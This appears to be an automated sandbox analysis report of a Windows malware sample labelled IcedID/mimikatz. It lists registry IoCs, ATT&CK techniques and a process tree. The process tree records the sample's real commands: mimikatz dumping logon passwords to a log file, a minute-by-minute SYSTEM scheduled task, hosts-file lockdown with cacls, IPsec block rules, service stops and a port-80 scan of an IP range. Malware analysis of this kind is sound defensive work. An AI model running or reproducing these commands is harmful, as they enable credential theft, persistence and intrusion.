Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iacqttm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	evlwailif.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	iacqttm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dbqlbfrvt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3492	cmd.exe
2740	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000700000002346b-6.dat	nsis_installer_2
behavioral2/files/0x0008000000023482-15.dat	nsis_installer_1
behavioral2/files/0x0008000000023482-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 45 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	iacqttm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	iacqttm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	iacqttm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	iacqttm.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	stiattrir.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	iacqttm.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	iacqttm.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	iacqttm.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	iacqttm.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	iacqttm.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2740	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3144	schtasks.exe
1892	schtasks.exe
3124	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found
652	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 24 IoCs

description	pid	Process
Token: SeDebugPrivilege	208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	4520	iacqttm.exe
Token: SeDebugPrivilege	1328	iacqttm.exe
Token: SeDebugPrivilege	3548	vfshost.exe
Token: SeDebugPrivilege	2616	stiattrir.exe
Token: SeLockMemoryPrivilege	2808	rqwpbp.exe
Token: SeLockMemoryPrivilege	2808	rqwpbp.exe
Token: SeDebugPrivilege	4312	stiattrir.exe
Token: SeDebugPrivilege	1184	stiattrir.exe
Token: SeDebugPrivilege	1584	stiattrir.exe
Token: SeDebugPrivilege	3352	stiattrir.exe
Token: SeDebugPrivilege	3688	stiattrir.exe
Token: SeDebugPrivilege	3440	stiattrir.exe
Token: SeDebugPrivilege	4072	stiattrir.exe
Token: SeDebugPrivilege	2404	stiattrir.exe
Token: SeDebugPrivilege	3756	stiattrir.exe
Token: SeDebugPrivilege	1016	stiattrir.exe
Token: SeDebugPrivilege	2004	stiattrir.exe
Token: SeDebugPrivilege	1496	stiattrir.exe
Token: SeDebugPrivilege	4912	stiattrir.exe
Token: SeDebugPrivilege	2352	stiattrir.exe
Token: SeDebugPrivilege	3940	stiattrir.exe
Token: SeDebugPrivilege	3624	stiattrir.exe
Token: SeDebugPrivilege	1608	stiattrir.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
4520	iacqttm.exe
4520	iacqttm.exe
1328	iacqttm.exe
1328	iacqttm.exe
4256	xohudmc.exe
2428	wooakm.exe
1112	iacqttm.exe
1112	iacqttm.exe
368	iacqttm.exe
368	iacqttm.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 208 wrote to memory of 3492	208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe	82
PID 208 wrote to memory of 3492	208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe	82
PID 208 wrote to memory of 3492	208	2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe	82
PID 3492 wrote to memory of 2740	3492	cmd.exe	84
PID 3492 wrote to memory of 2740	3492	cmd.exe	84
PID 3492 wrote to memory of 2740	3492	cmd.exe	84
PID 3492 wrote to memory of 4520	3492	cmd.exe	85
PID 3492 wrote to memory of 4520	3492	cmd.exe	85
PID 3492 wrote to memory of 4520	3492	cmd.exe	85
PID 1328 wrote to memory of 1348	1328	iacqttm.exe	87
PID 1328 wrote to memory of 1348	1328	iacqttm.exe	87
PID 1328 wrote to memory of 1348	1328	iacqttm.exe	87
PID 1348 wrote to memory of 4996	1348	cmd.exe	89
PID 1348 wrote to memory of 4996	1348	cmd.exe	89
PID 1348 wrote to memory of 4996	1348	cmd.exe	89
PID 1348 wrote to memory of 1504	1348	cmd.exe	90
PID 1348 wrote to memory of 1504	1348	cmd.exe	90
PID 1348 wrote to memory of 1504	1348	cmd.exe	90
PID 1348 wrote to memory of 4900	1348	cmd.exe	91
PID 1348 wrote to memory of 4900	1348	cmd.exe	91
PID 1348 wrote to memory of 4900	1348	cmd.exe	91
PID 1348 wrote to memory of 1612	1348	cmd.exe	92
PID 1348 wrote to memory of 1612	1348	cmd.exe	92
PID 1348 wrote to memory of 1612	1348	cmd.exe	92
PID 1348 wrote to memory of 744	1348	cmd.exe	93
PID 1348 wrote to memory of 744	1348	cmd.exe	93
PID 1348 wrote to memory of 744	1348	cmd.exe	93
PID 1348 wrote to memory of 824	1348	cmd.exe	94
PID 1348 wrote to memory of 824	1348	cmd.exe	94
PID 1348 wrote to memory of 824	1348	cmd.exe	94
PID 1328 wrote to memory of 3336	1328	iacqttm.exe	102
PID 1328 wrote to memory of 3336	1328	iacqttm.exe	102
PID 1328 wrote to memory of 3336	1328	iacqttm.exe	102
PID 1328 wrote to memory of 1408	1328	iacqttm.exe	104
PID 1328 wrote to memory of 1408	1328	iacqttm.exe	104
PID 1328 wrote to memory of 1408	1328	iacqttm.exe	104
PID 1328 wrote to memory of 1064	1328	iacqttm.exe	106
PID 1328 wrote to memory of 1064	1328	iacqttm.exe	106
PID 1328 wrote to memory of 1064	1328	iacqttm.exe	106
PID 1328 wrote to memory of 2696	1328	iacqttm.exe	110
PID 1328 wrote to memory of 2696	1328	iacqttm.exe	110
PID 1328 wrote to memory of 2696	1328	iacqttm.exe	110
PID 2696 wrote to memory of 4640	2696	cmd.exe	112
PID 2696 wrote to memory of 4640	2696	cmd.exe	112
PID 2696 wrote to memory of 4640	2696	cmd.exe	112
PID 4640 wrote to memory of 4220	4640	wpcap.exe	113
PID 4640 wrote to memory of 4220	4640	wpcap.exe	113
PID 4640 wrote to memory of 4220	4640	wpcap.exe	113
PID 4220 wrote to memory of 2416	4220	net.exe	115
PID 4220 wrote to memory of 2416	4220	net.exe	115
PID 4220 wrote to memory of 2416	4220	net.exe	115
PID 4640 wrote to memory of 2980	4640	wpcap.exe	116
PID 4640 wrote to memory of 2980	4640	wpcap.exe	116
PID 4640 wrote to memory of 2980	4640	wpcap.exe	116
PID 2980 wrote to memory of 3672	2980	net.exe	118
PID 2980 wrote to memory of 3672	2980	net.exe	118
PID 2980 wrote to memory of 3672	2980	net.exe	118
PID 4640 wrote to memory of 4476	4640	wpcap.exe	119
PID 4640 wrote to memory of 4476	4640	wpcap.exe	119
PID 4640 wrote to memory of 4476	4640	wpcap.exe	119
PID 4476 wrote to memory of 4376	4476	net.exe	121
PID 4476 wrote to memory of 4376	4476	net.exe	121
PID 4476 wrote to memory of 4376	4476	net.exe	121
PID 4640 wrote to memory of 4652	4640	wpcap.exe	122

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2104
- C:\Windows\TEMP\beegewark\rqwpbp.exe
  "C:\Windows\TEMP\beegewark\rqwpbp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2808

C:\Users\Admin\AppData\Local\Temp\2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:208
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ctnikqfc\iacqttm.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:3492
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2740
- - C:\Windows\ctnikqfc\iacqttm.exe
    C:\Windows\ctnikqfc\iacqttm.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4520

C:\Windows\ctnikqfc\iacqttm.exe
C:\Windows\ctnikqfc\iacqttm.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1328
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4996
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4900
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:1612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:744
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    - System Location Discovery: System Language Discovery
    PID:824
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3336
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1408
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2696
- - C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe
    C:\Windows\baerflpsi\ngfqdelbf\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4220
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        
        PID:2416
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3672
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4476
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4376
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      PID:4652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3456
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2652
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:1608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4072
- - C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe
    C:\Windows\baerflpsi\ngfqdelbf\evlwailif.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\baerflpsi\ngfqdelbf\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\baerflpsi\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:1676
- - C:\Windows\baerflpsi\Corporate\vfshost.exe
    C:\Windows\baerflpsi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3548
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "tmngtibdz" /ru system /tr "cmd /c C:\Windows\ime\iacqttm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:3124
